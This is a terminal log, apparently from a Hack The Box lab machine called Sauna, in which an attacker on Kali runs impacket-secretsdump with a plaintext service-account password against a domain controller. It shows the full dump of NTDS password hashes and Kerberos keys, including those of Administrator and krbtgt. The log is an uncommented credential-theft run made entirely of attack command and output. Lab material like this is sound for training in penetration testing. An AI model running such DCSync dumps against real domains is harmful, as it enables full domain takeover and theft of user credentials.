user@kali:/mnt/windows/htb/boxes/sauna$ impacket-secretsdump egotistical-bank.local/svc_loanmgr:'Moneymakestheworldgoround!'@sauna.egotistic
al-bank.local                                                                                                                              
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation             

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied                                                         
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)        
[*] Using the DRSUAPI method to get NTDS.DIT secrets                 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::                                                     
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                             
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::                                                            
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::                                    
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::                                    
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::                               
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:3308b988c1461f52ec6fc457c4b73f11:::                                                           
[*] Kerberos keys grabbed         
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031                                     
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0                                                                     
Administrator:des-cbc-md5:19d5f15d689b1ce5                           
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24                                            
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9      
krbtgt:des-cbc-md5:c170d5dc3edfc1d9                                  
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324                     
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9                                                     
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7           
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2                     
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b                                                     
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b           
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba                
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c                                                
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2      
SAUNA$:aes256-cts-hmac-sha1-96:e2e2248c07aea2aa9967a03b876d9af8c84273135dbe17350311b11b3a01cdab                                            
SAUNA$:aes128-cts-hmac-sha1-96:f357dea8bf6fdb3ceb9b710b0a59cfd7      
SAUNA$:des-cbc-md5:58b3d675c7d98f7a                                  
[*] Cleaning up...                
user@kali:/mnt/windows/htb/boxes/sauna$                               
